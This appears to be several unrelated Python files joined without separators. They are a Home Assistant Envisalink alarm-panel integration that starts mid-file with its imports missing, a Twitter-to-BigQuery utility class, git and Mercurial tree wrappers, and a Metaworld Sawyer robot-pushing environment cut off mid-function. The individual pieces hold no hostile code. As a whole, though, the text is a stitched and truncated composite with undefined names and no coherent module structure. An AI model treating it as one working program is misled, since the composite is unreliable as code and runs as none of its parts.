CONF_ZONENAME = 'name'
CONF_ZONES = 'zones'
CONF_ZONETYPE = 'type'

# Defaults applied by CONFIG_SCHEMA below.
DEFAULT_PORT = 4025
DEFAULT_EVL_VERSION = 3
DEFAULT_KEEPALIVE = 60
DEFAULT_ZONEDUMP_INTERVAL = 30
DEFAULT_ZONETYPE = 'opening'
DEFAULT_PANIC = 'Police'
DEFAULT_TIMEOUT = 10

# Dispatcher signals used to fan updates out to platform entities.
SIGNAL_ZONE_UPDATE = 'envisalink.zones_updated'
SIGNAL_PARTITION_UPDATE = 'envisalink.partition_updated'
SIGNAL_KEYPAD_UPDATE = 'envisalink.keypad_updated'

ZONE_SCHEMA = vol.Schema({
    vol.Required(CONF_ZONENAME): cv.string,
    vol.Optional(CONF_ZONETYPE, default=DEFAULT_ZONETYPE): cv.string})

PARTITION_SCHEMA = vol.Schema({
    vol.Required(CONF_PARTITIONNAME): cv.string})

CONFIG_SCHEMA = vol.Schema({
    DOMAIN: vol.Schema({
        vol.Required(CONF_EVL_HOST): cv.string,
        vol.Required(CONF_PANEL_TYPE):
            vol.All(cv.string, vol.In(['HONEYWELL', 'DSC'])),
        vol.Required(CONF_USERNAME): cv.string,
        vol.Required(CONF_PASS): cv.string,
        vol.Optional(CONF_CODE): cv.string,
        vol.Optional(CONF_PANIC, default=DEFAULT_PANIC): cv.string,
        vol.Optional(CONF_ZONES): {vol.Coerce(int): ZONE_SCHEMA},
        vol.Optional(CONF_PARTITIONS): {vol.Coerce(int): PARTITION_SCHEMA},
        vol.Optional(CONF_EVL_PORT, default=DEFAULT_PORT): cv.port,
        vol.Optional(CONF_EVL_VERSION, default=DEFAULT_EVL_VERSION):
            vol.All(vol.Coerce(int), vol.Range(min=3, max=4)),
        vol.Optional(CONF_EVL_KEEPALIVE, default=DEFAULT_KEEPALIVE):
            vol.All(vol.Coerce(int), vol.Range(min=15)),
        vol.Optional(
            CONF_ZONEDUMP_INTERVAL,
            default=DEFAULT_ZONEDUMP_INTERVAL): vol.Coerce(int),
        vol.Optional(
            CONF_TIMEOUT, default=DEFAULT_TIMEOUT): vol.Coerce(int),
    }),
}, extra=vol.ALLOW_EXTRA)

SERVICE_CUSTOM_FUNCTION = 'invoke_custom_function'
ATTR_CUSTOM_FUNCTION = 'pgm'
ATTR_PARTITION = 'partition'

SERVICE_SCHEMA = vol.Schema({
    vol.Required(ATTR_CUSTOM_FUNCTION): cv.string,
    vol.Required(ATTR_PARTITION): cv.string,
})


async def async_setup(hass, config):
    """Set up for Envisalink devices.

    Creates the panel controller, wires its event callbacks to Home
    Assistant dispatcher signals, waits for the initial connection, then
    loads the dependent platforms and registers the custom-function
    service. Returns False if login or connection fails.
    """
    from pyenvisalink import EnvisalinkAlarmPanel

    conf = config.get(DOMAIN)

    host = conf.get(CONF_EVL_HOST)
    port = conf.get(CONF_EVL_PORT)
    code = conf.get(CONF_CODE)
    panel_type = conf.get(CONF_PANEL_TYPE)
    panic_type = conf.get(CONF_PANIC)
    version = conf.get(CONF_EVL_VERSION)
    user = conf.get(CONF_USERNAME)
    password = conf.get(CONF_PASS)
    keep_alive = conf.get(CONF_EVL_KEEPALIVE)
    zone_dump = conf.get(CONF_ZONEDUMP_INTERVAL)
    zones = conf.get(CONF_ZONES)
    partitions = conf.get(CONF_PARTITIONS)
    connection_timeout = conf.get(CONF_TIMEOUT)
    # Resolved to True/False by the connection/login callbacks below.
    sync_connect = asyncio.Future(loop=hass.loop)

    controller = EnvisalinkAlarmPanel(
        host, port, panel_type, version, user, password, zone_dump,
        keep_alive, hass.loop, connection_timeout)
    hass.data[DATA_EVL] = controller

    @callback
    def login_fail_callback(data):
        """Handle when the evl rejects our login."""
        _LOGGER.error("The Envisalink rejected your credentials")
        if not sync_connect.done():
            sync_connect.set_result(False)

    @callback
    def connection_fail_callback(data):
        """Network failure callback."""
        _LOGGER.error("Could not establish a connection with the Envisalink")
        if not sync_connect.done():
            sync_connect.set_result(False)

    @callback
    def connection_success_callback(data):
        """Handle a successful connection."""
        _LOGGER.info("Established a connection with the Envisalink")
        if not sync_connect.done():
            # Only register the shutdown hook once we are actually connected.
            hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP,
                                       stop_envisalink)
            sync_connect.set_result(True)

    @callback
    def zones_updated_callback(data):
        """Handle zone timer updates."""
        _LOGGER.debug("Envisalink sent a zone update event. Updating zones...")
        async_dispatcher_send(hass, SIGNAL_ZONE_UPDATE, data)

    @callback
    def alarm_data_updated_callback(data):
        """Handle non-alarm based info updates."""
        _LOGGER.debug("Envisalink sent new alarm info. Updating alarms...")
        async_dispatcher_send(hass, SIGNAL_KEYPAD_UPDATE, data)

    @callback
    def partition_updated_callback(data):
        """Handle partition changes thrown by evl (including alarms)."""
        _LOGGER.debug("The envisalink sent a partition update event")
        async_dispatcher_send(hass, SIGNAL_PARTITION_UPDATE, data)

    @callback
    def stop_envisalink(event):
        """Shutdown envisalink connection and thread on exit."""
        _LOGGER.info("Shutting down Envisalink")
        controller.stop()

    async def handle_custom_function(call):
        """Handle custom/PGM service."""
        custom_function = call.data.get(ATTR_CUSTOM_FUNCTION)
        partition = call.data.get(ATTR_PARTITION)
        controller.command_output(code, partition, custom_function)

    # Wire panel events to the handlers defined above.
    controller.callback_zone_timer_dump = zones_updated_callback
    controller.callback_zone_state_change = zones_updated_callback
    controller.callback_partition_state_change = partition_updated_callback
    controller.callback_keypad_update = alarm_data_updated_callback
    controller.callback_login_failure = login_fail_callback
    controller.callback_login_timeout = connection_fail_callback
    controller.callback_login_success = connection_success_callback

    _LOGGER.info("Start envisalink.")
    controller.start()

    # Block setup until one of the connection callbacks resolves the future.
    result = await sync_connect
    if not result:
        return False

    # Load sub-components for Envisalink
    if partitions:
        hass.async_create_task(async_load_platform(
            hass, 'alarm_control_panel', 'envisalink', {
                CONF_PARTITIONS: partitions,
                CONF_CODE: code,
                CONF_PANIC: panic_type
            }, config
        ))
        hass.async_create_task(async_load_platform(
            hass, 'sensor', 'envisalink', {
                CONF_PARTITIONS: partitions,
                CONF_CODE: code
            }, config
        ))
    if zones:
        hass.async_create_task(async_load_platform(
            hass, 'binary_sensor', 'envisalink', {
                CONF_ZONES: zones
            }, config
        ))

    hass.services.async_register(DOMAIN, SERVICE_CUSTOM_FUNCTION,
                                 handle_custom_function,
                                 schema=SERVICE_SCHEMA)

    return True


class EnvisalinkDevice(Entity):
    """Representation of an Envisalink device.

    Base entity for the Envisalink platforms; state updates arrive via
    dispatcher signals, so no polling is needed.
    """

    def __init__(self, name, info, controller):
        """Initialize the device."""
        self._controller = controller
        self._info = info
        self._name = name

    @property
    def name(self):
        """Return the name of the device."""
        return self._name

    @property
    def should_poll(self):
        """No polling needed."""
        return False
import os
import sys

BASE_DIR = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, "%s/libs" % BASE_DIR)

import time
import json
from datetime import datetime, timedelta

import httplib2
import logging.config

from config import Config
from apiclient.discovery import build
from apiclient.errors import HttpError
from gnippy import rules, searchclient

# Load project configuration; use a context manager so the handle is
# closed promptly (the original used the py2-only file() and leaked it).
with open("./config") as f:
    config = Config(f)


class Utils:
    """Helpers for streaming Gnip/Twitter data into Google BigQuery."""

    # Lazily-created, cached BigQuery client (see get_bq).
    BQ_CLIENT = None

    @staticmethod
    def get_bq():
        """Return a cached, authorized BigQuery client.

        Uses App Engine credentials when running on Google's stack,
        otherwise a service-account key read from config.KEY_FILE.
        """
        if Utils.BQ_CLIENT:
            return Utils.BQ_CLIENT

        BQ_CREDENTIALS = None
        # If running on Google stack, authenticate natively
        if Utils.isGae():
            from oauth2client import appengine
            BQ_CREDENTIALS = appengine.AppAssertionCredentials(
                scope='https://www.googleapis.com/auth/bigquery')
        else:
            from oauth2client.client import SignedJwtAssertionCredentials
            KEY = Utils.read_file(config.KEY_FILE)
            BQ_CREDENTIALS = SignedJwtAssertionCredentials(
                config.SERVICE_ACCOUNT, KEY,
                'https://www.googleapis.com/auth/bigquery')

        BQ_HTTP = BQ_CREDENTIALS.authorize(httplib2.Http())
        Utils.BQ_CLIENT = build('bigquery', 'v2', http=BQ_HTTP)
        return Utils.BQ_CLIENT

    @staticmethod
    def isGae():
        """Return True when running under Google App Engine (or its dev server)."""
        # http://stackoverflow.com/questions/1916579/in-python-how-can-i-test-if-im-in-google-app-engine-sdk
        software = os.environ.get('SERVER_SOFTWARE', None)
        return software and ("Google App Engine" in software or
                             "Development" in software)

    @staticmethod
    def get_gnip():
        """Return a Gnip search client built from the configured credentials."""
        return searchclient.SearchClient(config.GNIP_USERNAME,
                                         config.GNIP_PASSWORD,
                                         config.GNIP_SEARCH_URL)

    @staticmethod
    def insert_table(dataset_id, table_id, schema):
        """Create a BigQuery table with the given schema.

        Returns the API response, or True if the table already exists
        (HTTP 409); re-raises any other HttpError.
        """
        body = {
            "tableReference": {
                "projectId": config.PROJECT_ID,
                "tableId": table_id,
                "datasetId": dataset_id
            },
            "schema": {
                "fields": schema
            }
        }

        response = None
        try:
            response = Utils.get_bq().tables().insert(
                projectId=config.PROJECT_ID, datasetId=dataset_id,
                body=body).execute()
        except HttpError as e:
            # HttpError 409 when requesting URI returned
            # "Already Exists: Table twitter-for-bigquery:gnip.tweets_nbafinals"
            if e.resp.status == 409:
                response = True
            else:
                raise
        return response

    @staticmethod
    def insert_records(dataset_id, table_id, tweets):
        """Stream tweet records into a BigQuery table and return the response."""
        # ensure insertId to avoid duplicate records
        body = {
            "kind": "bigquery#tableDataInsertAllRequest",
            "rows": [
                {"insertId": t["id"], "json": Utils.scrub(t)} for t in tweets
            ]
        }
        response = Utils.get_bq().tabledata().insertAll(
            projectId=config.PROJECT_ID, datasetId=dataset_id,
            tableId=table_id, body=body).execute()
        return response

    @staticmethod
    def import_from_file(dataset_id, table_id, filename, single_tweet=False):
        """Import tweets from a newline-delimited JSON file into BigQuery.

        When single_tweet is True the file is treated as one JSON tweet;
        otherwise each line is a tweet, and delete notices (objects with a
        "delete" key) are skipped. Returns the insertAll response.

        Fixes vs. the original: the batch branch inserted an undefined
        name ([record]) instead of the accumulated records, parsed each
        line twice, never returned, and the single-tweet branch read an
        undefined SAMPLE_TWEET_FILE instead of the filename argument.
        """
        if single_tweet:
            records = [json.loads(Utils.read_file(filename))]
            return Utils.insert_records(dataset_id, table_id, records)

        records = []
        with open(filename, "r") as infile:
            for line in infile:
                tweet = json.loads(line)  # parse once per line
                if tweet.get("delete", None) is None:
                    records.append(Utils.scrub(tweet))
        return Utils.insert_records(dataset_id, table_id, records)

    @staticmethod
    def get_config(config_file):
        """Return the public attributes of the loaded config as a dict.

        NOTE(review): config_file is accepted but unused; the module-level
        `config` object is inspected instead — kept for interface
        compatibility.
        """
        props = {}
        for name in (name for name in dir(config) if not name.startswith('_')):
            props[name] = getattr(config, name, '')
        return props

    @staticmethod
    def enable_logging():
        """Configure logging (DEBUG on GAE, logging.conf otherwise).

        Returns the "root" logger when configured from file, else None.
        """
        root = None
        if Utils.isGae():
            logging.getLogger().setLevel(logging.DEBUG)
        else:
            path = "./logging.conf"
            logging.config.fileConfig(path)
            root = logging.getLogger("root")
        return root

    @staticmethod
    # BUGBUG: aim to NOT scrub results
    def scrub(d):
        """Recursively drop fields BigQuery can't ingest and normalize dates.

        Removes None values and a few problematic nested objects, and
        rewrites 'created_at' into BigQuery timestamp format. Mutates and
        returns d.
        """
        # Iterate over a snapshot so deleting keys is safe (deleting while
        # iterating d.items() raises RuntimeError on Python 3).
        for key, value in list(d.items()):
            if value is None:
                del d[key]
            elif key == 'coordinates':
                del d[key]
            elif key == 'attributes':  # in 'place' object
                del d[key]
            elif key == 'bounding_box':  # in 'place' object
                del d[key]
            elif key == 'retweeted_status':
                del d[key]
            elif key == 'created_at':
                d[key] = Utils.convert_timestamp(value)
            elif isinstance(value, dict):
                Utils.scrub(value)
        return d

    # For convenience
    @staticmethod
    def read_file(fn):
        """Return the full contents of a text file."""
        with open(fn, "r") as infile:
            return infile.read()

    @staticmethod
    def convert_timestamp(str):
        """Convert a Twitter created_at string to 'YYYY-MM-DD HH:MM:SS'."""
        # NOTE(review): parameter shadows the str builtin; name kept so any
        # keyword callers keep working.
        ts = time.strptime(str, '%a %b %d %H:%M:%S +0000 %Y')
        return time.strftime('%Y-%m-%d %H:%M:%S', ts)

    @staticmethod
    def millis_to_date(ts):
        """Convert epoch milliseconds to a datetime."""
        return datetime.fromtimestamp(ts / 1000)

    @staticmethod
    def millis_to_str(ts, format='%Y-%m-%d %H:%M'):
        """Format epoch milliseconds using the given strftime format."""
        return Utils.millis_to_date(ts).strftime(format)

    @staticmethod
    def parse_bqid(id):
        """Split a BigQuery id like 'project:dataset.table' into its parts."""
        if id:
            import re
            return re.split(r'\:|\.', id)
        return None

    @staticmethod
    def make_tag(dataset, table):
        """Return the 'dataset.table' tag for a table."""
        return "%s.%s" % (dataset, table)

# main() generates a schema from a tweet. It requires the following
# library to work, and is not included in this TwitterDev package
# https://github.com/tylertreat/BigQuery-Python
#
# def main():
#
#     from bigquery import schema_from_record
#
#     tweet_str = Utils.read_file("data/sample_tweet_powertrack.json")
#     record = json.loads(tweet_str)
#     schema = schema_from_record(record)
#     schema = json.dumps(schema)
#     print schema
#
#     with open('data/schema.json', 'wt') as out:
#         res = json.dump(schema, out, sort_keys=False, indent=4, separators=(',', ': '))
#
# if __name__ == "__main__":
#     main()
import os
import re
import subprocess
import tempfile

from .. import vcs
from ..vcs import git, hg


def get_unique_name(existing, initial):
    """Get a name either equal to initial or of the form initial_N, for some
    integer N, that is not in the set existing.


    :param existing: Set of names that must not be chosen.
    :param initial: Name, or name prefix, to use"""
    if initial not in existing:
        return initial
    # Try initial_1, initial_2, ...; len(existing) + 1 attempts always
    # suffice since existing holds fewer names than that.
    for i in range(len(existing) + 1):
        test = "%s_%s" % (initial, i + 1)
        if test not in existing:
            return test
    assert False


class NoVCSTree(object):
    """Stub tree for a working directory under no version control.

    Provides the same interface as HgTree/GitTree, with every VCS
    operation a no-op.
    """
    name = "non-vcs"

    def __init__(self, root=None):
        if root is None:
            root = os.path.abspath(os.curdir)
        self.root = root

    @classmethod
    def is_type(cls, path=None):
        # Any directory qualifies as a non-VCS tree.
        return True

    @property
    def is_clean(self):
        return True

    def add_new(self, prefix=None):
        pass

    def add_ignored(self, sync_tree, prefix):
        pass

    def create_patch(self, patch_name, message):
        pass

    def update_patch(self, include=None):
        pass

    def commit_patch(self):
        pass


class HgTree(object):
    """Wrapper for patch-queue-based operations on a Mercurial checkout."""
    name = "mercurial"

    def __init__(self, root=None):
        if root is None:
            root = hg("root").strip()
        self.root = root
        # Bound command runner that always targets this repository.
        self.hg = vcs.bind_to_repo(hg, self.root)

    def __getstate__(self):
        # The bound command callable isn't picklable; drop it and
        # recreate it in __setstate__.
        rv = self.__dict__.copy()
        del rv['hg']
        return rv

    def __setstate__(self, dict):
        self.__dict__.update(dict)
        self.hg = vcs.bind_to_repo(vcs.hg, self.root)

    @classmethod
    def is_type(cls, path=None):
        """Return True if path (or the cwd) is inside a Mercurial repo."""
        kwargs = {"log_error": False}
        if path is not None:
            kwargs["repo"] = path
        try:
            hg("root", **kwargs)
        except Exception:
            return False
        return True

    @property
    def is_clean(self):
        # Command output is bytes; empty status output means no changes.
        return self.hg("status").strip() == b""

    def add_new(self, prefix=None):
        if prefix is not None:
            args = ("-I", prefix)
        else:
            args = ()
        self.hg("add", *args)

    def add_ignored(self, sync_tree, prefix):
        pass

    def create_patch(self, patch_name, message):
        """Create a new mq patch, uniquifying the name if it already exists."""
        try:
            # qinit fails harmlessly if the patch queue already exists.
            self.hg("qinit", log_error=False)
        except subprocess.CalledProcessError:
            pass

        patch_names = [item.strip() for item in self.hg("qseries").split(b"\n")
                       if item.strip()]

        suffix = 0
        test_name = patch_name
        while test_name in patch_names:
            suffix += 1
            test_name = "%s-%i" % (patch_name, suffix)

        self.hg("qnew", test_name, "-X", self.root, "-m", message)

    def update_patch(self, include=None):
        """Refresh the current mq patch, optionally limited to given paths."""
        if include is not None:
            args = []
            for item in include:
                args.extend(["-I", item])
        else:
            args = ()

        self.hg("qrefresh", *args)
        return True

    def commit_patch(self):
        # Fold the applied patch queue into permanent changesets.
        self.hg("qfinish")

    def contains_commit(self, commit):
        """Return True if the given commit's sha1 resolves in this repo."""
        try:
            self.hg("identify", "-r", commit.sha1)
            return True
        except subprocess.CalledProcessError:
            return False


class GitTree(object):
    """Wrapper for sync-related operations on a git checkout."""
    name = "git"

    def __init__(self, root=None, log_error=True):
        if root is None:
            root = git("rev-parse", "--show-toplevel",
                       log_error=log_error).strip().decode('utf-8')
        self.root = root
        # Bound command runner that always targets this repository.
        self.git = vcs.bind_to_repo(git, self.root, log_error=log_error)
        # Pending commit message, set by create_patch and used by commit_patch.
        self.message = None
        self.commit_cls = Commit

    def __getstate__(self):
        # The bound command callable isn't picklable; drop it and
        # recreate it in __setstate__.
        rv = self.__dict__.copy()
        del rv['git']
        return rv

    def __setstate__(self, dict):
        self.__dict__.update(dict)
        self.git = vcs.bind_to_repo(vcs.git, self.root)

    @classmethod
    def is_type(cls, path=None):
        """Return True if path (or the cwd) is inside a git repo."""
        kwargs = {"log_error": False}
        if path is not None:
            kwargs["repo"] = path
        try:
            git("rev-parse", "--show-toplevel", **kwargs)
        except Exception:
            return False
        return True

    @property
    def rev(self):
        """Current HEAD revision"""
        if vcs.is_git_root(self.root):
            return self.git("rev-parse", "HEAD").strip()
        else:
            return None

    @property
    def is_clean(self):
        # Command output is bytes; empty status output means no changes.
        return self.git("status").strip() == b""

    def add_new(self, prefix=None):
        """Add files to the staging area.

        :param prefix: None to include all files or a path prefix to
                       add all files under that path.
        """
        if prefix is None:
            args = ["-a"]
        else:
            args = ["--no-ignore-removal", prefix]
        self.git("add", *args)

    def add_ignored(self, sync_tree, prefix):
        """Add files to the staging area that are explicitly ignored by git.

        :param prefix: None to include all files or a path prefix to
                       add all files under that path.
        """
        with tempfile.TemporaryFile() as f:
            # Feed sync_tree's tracked file list through check-ignore to
            # find which of those paths this tree's .gitignore excludes.
            sync_tree.git("ls-tree", "-z", "-r", "--name-only", "HEAD",
                          stdout=f)
            f.seek(0)
            ignored_files = sync_tree.git("check-ignore", "--no-index",
                                          "--stdin", "-z", stdin=f)
        args = []
        for entry in ignored_files.decode('utf-8').split('\0'):
            args.append(os.path.join(prefix, entry))
        if args:
            self.git("add", "--force", *args)

    def list_refs(self, ref_filter=None):
        """Get a list of sha1, name tuples for references in a repository.

        :param ref_filter: Pattern that reference name must match (from the
                           end, matching whole /-delimited segments only)
        """
        args = []
        if ref_filter is not None:
            args.append(ref_filter)
        data = self.git("show-ref", *args)
        rv = []
        for line in data.split(b"\n"):
            if not line.strip():
                continue
            # Each line is "<sha1> <refname>"; both stay as bytes.
            sha1, ref = line.split()
            rv.append((sha1, ref))
        return rv

    def list_remote(self, remote, ref_filter=None):
        """Return a list of (sha1, name) tuples for references in a remote.

        :param remote: URL of the remote to list.
        :param ref_filter: Pattern that the reference name must match.
        """
        args = []
        if ref_filter is not None:
            args.append(ref_filter)
        data = self.git("ls-remote", remote, *args)
        rv = []
        for line in data.split(b"\n"):
            if not line.strip():
                continue
            # Each line is "<sha1>\t<refname>"; both stay as bytes.
            sha1, ref = line.split()
            rv.append((sha1, ref))
        return rv

    def get_remote_sha1(self, remote, branch):
        """Return the SHA1 of a particular branch in a remote.

        :param remote: the remote URL
        :param branch: the branch name"""
        for sha1, ref in self.list_remote(remote, branch):
            if ref.decode('utf-8') == "refs/heads/%s" % branch:
                return self.commit_cls(self, sha1.decode('utf-8'))
        # The branch must exist on the remote.
        assert False

    def create_patch(self, patch_name, message):
        # In git a patch is actually a commit
        self.message = message

    def update_patch(self, include=None):
        """Commit the staged changes, or changes to listed files.

        :param include: Either None, to commit staged changes, or a list
                        of filenames (which must already be in the repo)
                        to commit
        """
        if include is not None:
            args = tuple(include)
        else:
            args = ()

        if self.git("status", "-uno", "-z", *args).strip():
            self.git("add", *args)
            return True
        return False

    def commit_patch(self):
        """Commit staged changes using the message set by create_patch.

        Returns True if a commit was made, False if nothing was staged.
        """
        assert self.message is not None

        if self.git("diff", "--name-only", "--staged", "-z").strip():
            self.git("commit", "-m", self.message)
            return True
        return False

    def init(self):
        """Initialize a fresh git repository at self.root."""
        self.git("init")
        assert vcs.is_git_root(self.root)

    def checkout(self, rev, branch=None, force=False):
        """Checkout a particular revision, optionally into a named branch.

        :param rev: Revision identifier (e.g. SHA1) to checkout
        :param branch: Branch name to use
        :param force: Force-checkout
        """
        assert rev is not None

        args = []
        if branch:
            # Avoid clashing with an existing local branch name.
            branches = [ref[len("refs/heads/"):].decode('utf-8')
                        for sha1, ref in self.list_refs()
                        if ref.startswith(b"refs/heads/")]
            branch = get_unique_name(branches, branch)

            args += ["-b", branch]

        if force:
            args.append("-f")
        args.append(rev)
        self.git("checkout", *args)

    def update(self, remote, remote_branch, local_branch):
        """Fetch from the remote and checkout into a local branch.

        :param remote: URL to the remote repository
        :param remote_branch: Branch on the remote repository to check out
        :param local_branch: Local branch name to check out into
        """
        if not vcs.is_git_root(self.root):
            self.init()
        # Remove untracked/ignored files before updating.
        self.git("clean", "-xdf")
        self.git("fetch", remote, "%s:%s" % (remote_branch, local_branch))
        self.checkout(local_branch)
        self.git("submodule", "update", "--init", "--recursive")

    def clean(self):
        # NOTE(review): self.local_branch is not set anywhere in this
        # module — presumably assigned externally; verify before relying
        # on this method.
        self.git("checkout", self.rev)
        self.git("branch", "-D", self.local_branch)

    def paths(self):
        """List paths in the tree"""
        repo_paths = [self.root] + [os.path.join(self.root, path)
                                    for path in self.submodules()]

        rv = []

        for repo_path in repo_paths:
            # Paths are made relative to the top-level root, including
            # files living inside submodules.
            paths = vcs.git("ls-tree", "-r", "--name-only", "HEAD",
                            repo=repo_path).split(b"\n")
            rv.extend(os.path.relpath(os.path.join(repo_path,
                                                   item.decode('utf-8')),
                                      self.root)
                      for item in paths if item.strip())
        return rv

    def submodules(self):
        """List submodule directories"""
        output = self.git("submodule", "status", "--recursive")
        rv = []
        for line in output.split(b"\n"):
            line = line.strip()
            if not line:
                continue
            # "submodule status" lines look like "<sha1> <path> (<ref>)";
            # the second field is the path (kept as bytes).
            parts = line.split(b" ")
            rv.append(parts[1])
        return rv

    def contains_commit(self, commit):
        """Return True if the given commit's sha1 resolves in this repo."""
        try:
            self.git("rev-parse", "--verify", commit.sha1)
            return True
        except subprocess.CalledProcessError:
            return False


class CommitMessage(object):
    """Parsed commit message: first line as summary, rest as body."""

    def __init__(self, text):
        self.text = text
        self._parse_message()

    def __str__(self):
        return self.text

    def _parse_message(self):
        # Sets self.full_summary (first line) and self.body (the rest).
        lines = self.text.splitlines()
        self.full_summary = lines[0]
        self.body = "\n".join(lines[1:])


class Commit(object):
    msg_cls = CommitMessage

    # Full 40-hex-digit sha1 only; abbreviated hashes are rejected.
    _sha1_re = re.compile("^[0-9a-f]{40}$")

    def __init__(self, tree, sha1):
        """Object representing a commit in a specific GitTree.

        :param tree: GitTree to which this commit belongs.
        :param sha1: Full sha1 string for the commit
        """
        assert self._sha1_re.match(sha1)

        self.tree = tree
        self.git = tree.git
        self.sha1 = sha1
        self.author, self.email, self.message = self._get_meta()

    def __getstate__(self):
        # The bound command callable isn't picklable; drop it and
        # recreate it in __setstate__.
        rv = self.__dict__.copy()
        del rv['git']
        return rv

    def __setstate__(self, dict):
        self.__dict__.update(dict)
        self.git = self.tree.git

    def _get_meta(self):
        """Return (author, email, parsed message) for this commit."""
        # %an/%ae/%B: author name, author email, raw body — split on the
        # first two newlines so the message may itself contain newlines.
        author, email, message = self.git(
            "show", "-s", "--format=format:%an\n%ae\n%B",
            self.sha1).decode('utf-8').split("\n", 2)
        return author, email, self.msg_cls(message)
import numpy as np
from gym.spaces import Box
from scipy.spatial.transform import Rotation

from metaworld.envs import reward_utils
from metaworld.envs.asset_path_utils import full_v2_path_for
from metaworld.envs.mujoco.sawyer_xyz.sawyer_xyz_env import SawyerXYZEnv, _assert_task_is_set


class SawyerPushBackEnvV2(SawyerXYZEnv):
    """Sawyer task: push the object from its spawn area back toward a goal
    position nearer the robot.

    Reward combines a gripper "caging" term (how well the pads bracket the
    object) with an "in place" term (object distance to target).
    """

    OBJ_RADIUS = 0.007     # object radius used by the caging reward (meters)
    TARGET_RADIUS = 0.05   # object counts as at-goal within this distance (meters)

    def __init__(self):
        goal_low = (-0.1, 0.6, 0.0199)
        goal_high = (0.1, 0.7, 0.0201)
        hand_low = (-0.5, 0.40, 0.05)
        hand_high = (0.5, 1, 0.5)
        obj_low = (-0.1, 0.8, 0.02)
        obj_high = (0.1, 0.85, 0.02)

        super().__init__(
            self.model_name,
            hand_low=hand_low,
            hand_high=hand_high,
        )

        self.init_config = {
            'obj_init_pos': np.array([0, 0.8, 0.02]),
            'obj_init_angle': 0.3,
            'hand_init_pos': np.array([0, 0.6, 0.2], dtype=np.float32),
        }
        self.goal = np.array([0., 0.6, 0.02])
        self.obj_init_pos = self.init_config['obj_init_pos']
        self.obj_init_angle = self.init_config['obj_init_angle']
        self.hand_init_pos = self.init_config['hand_init_pos']

        # Random-reset vector layout: (obj_xyz, goal_xyz).
        self._random_reset_space = Box(
            np.hstack((obj_low, goal_low)),
            np.hstack((obj_high, goal_high)),
        )
        self.goal_space = Box(np.array(goal_low), np.array(goal_high))

    @property
    def model_name(self):
        return full_v2_path_for('sawyer_xyz/sawyer_push_back_v2.xml')

    @_assert_task_is_set
    def evaluate_state(self, obs, action):
        """Compute the step reward plus the metrics dict for this state.

        Returns ``(reward, info)`` where ``info`` carries success/grasp/near
        indicator floats and the raw reward components.
        """
        obj = obs[4:7]
        (
            reward,
            tcp_to_obj,
            tcp_opened,
            target_to_obj,
            object_grasped,
            in_place
        ) = self.compute_reward(action, obs)

        success = float(target_to_obj <= 0.07)
        near_object = float(tcp_to_obj <= 0.03)
        # A grasp requires touching the object, a non-closed gripper signal,
        # and the object lifted above its initial height (0.02 slack).
        grasp_success = float(self.touching_object and (tcp_opened > 0) and
                              (obj[2] - 0.02 > self.obj_init_pos[2]))

        info = {
            'success': success,
            'near_object': near_object,
            'grasp_success': grasp_success,
            'grasp_reward': object_grasped,
            'in_place_reward': in_place,
            'obj_to_target': target_to_obj,
            'unscaled_reward': reward,
        }
        return reward, info

    def _get_pos_objects(self):
        return self.data.get_geom_xpos('objGeom')

    def _get_quat_objects(self):
        # Convert the geom's rotation matrix to a quaternion.
        return Rotation.from_matrix(
            self.data.get_geom_xmat('objGeom')
        ).as_quat()

    def adjust_initObjPos(self, orig_init_pos):
        # This is to account for meshes for the geom and object are not
        # aligned. If this is not done, the object could be initialized in an
        # extreme position.
        diff = self.get_body_com('obj')[:2] - self.data.get_geom_xpos('objGeom')[:2]
        adjustedPos = orig_init_pos[:2] + diff
        # The convention we follow is that body_com[2] is always 0, and
        # geom_pos[2] is the object height.
        return [adjustedPos[0], adjustedPos[1], self.data.get_geom_xpos('objGeom')[-1]]

    def reset_model(self):
        """Reset hand, object and goal; with random_init, resample until the
        object spawns at least 0.15 m from the target."""
        self._reset_hand()
        self._target_pos = self.goal.copy()
        self.obj_init_pos = self.adjust_initObjPos(self.init_config['obj_init_pos'])
        self.obj_init_angle = self.init_config['obj_init_angle']

        if self.random_init:
            goal_pos = self._get_state_rand_vec()
            # Goal keeps the object's z so it lies on the table surface.
            self._target_pos = np.concatenate((goal_pos[-3:-1],
                                               [self.obj_init_pos[-1]]))
            while np.linalg.norm(goal_pos[:2] - self._target_pos[:2]) < 0.15:
                goal_pos = self._get_state_rand_vec()
                self._target_pos = np.concatenate((goal_pos[-3:-1],
                                                   [self.obj_init_pos[-1]]))
            self.obj_init_pos = np.concatenate((goal_pos[:2],
                                                [self.obj_init_pos[-1]]))

        self._set_obj_xyz(self.obj_init_pos)
        return self._get_obs()

    def _gripper_caging_reward(self, action, obj_position, obj_radius):
        """Reward in [0, 1] for how well the gripper pads cage (and grip) the
        object, combining a y-axis bracketing term with an x-z alignment term
        via Hamacher products."""
        pad_success_margin = 0.05
        grip_success_margin = obj_radius + 0.003
        x_z_success_margin = 0.01

        tcp = self.tcp_center
        left_pad = self.get_body_com('leftpad')
        right_pad = self.get_body_com('rightpad')
        delta_object_y_left_pad = left_pad[1] - obj_position[1]
        delta_object_y_right_pad = obj_position[1] - right_pad[1]
        right_caging_margin = abs(abs(obj_position[1] - self.init_right_pad[1])
                                  - pad_success_margin)
        left_caging_margin = abs(abs(obj_position[1] - self.init_left_pad[1])
                                 - pad_success_margin)

        right_caging = reward_utils.tolerance(delta_object_y_right_pad,
                                              bounds=(obj_radius, pad_success_margin),
                                              margin=right_caging_margin,
                                              sigmoid='long_tail',
                                              )
        left_caging = reward_utils.tolerance(delta_object_y_left_pad,
                                             bounds=(obj_radius, pad_success_margin),
                                             margin=left_caging_margin,
                                             sigmoid='long_tail',
                                             )

        # Tighter bounds than caging: pads must be nearly touching the object.
        right_gripping = reward_utils.tolerance(delta_object_y_right_pad,
                                                bounds=(obj_radius, grip_success_margin),
                                                margin=right_caging_margin,
                                                sigmoid='long_tail',
                                                )
        left_gripping = reward_utils.tolerance(delta_object_y_left_pad,
                                               bounds=(obj_radius, grip_success_margin),
                                               margin=left_caging_margin,
                                               sigmoid='long_tail',
                                               )

        assert right_caging >= 0 and right_caging <= 1
        assert left_caging >= 0 and left_caging <= 1

        y_caging = reward_utils.hamacher_product(right_caging, left_caging)
        y_gripping = reward_utils.hamacher_product(right_gripping, left_gripping)

        assert y_caging >= 0 and y_caging <= 1

        # Project tcp and object into the x-z plane (zero out y).
        tcp_xz = tcp + np.array([0., -tcp[1], 0.])
        obj_position_x_z = np.copy(obj_position) + np.array([0., -obj_position[1], 0.])
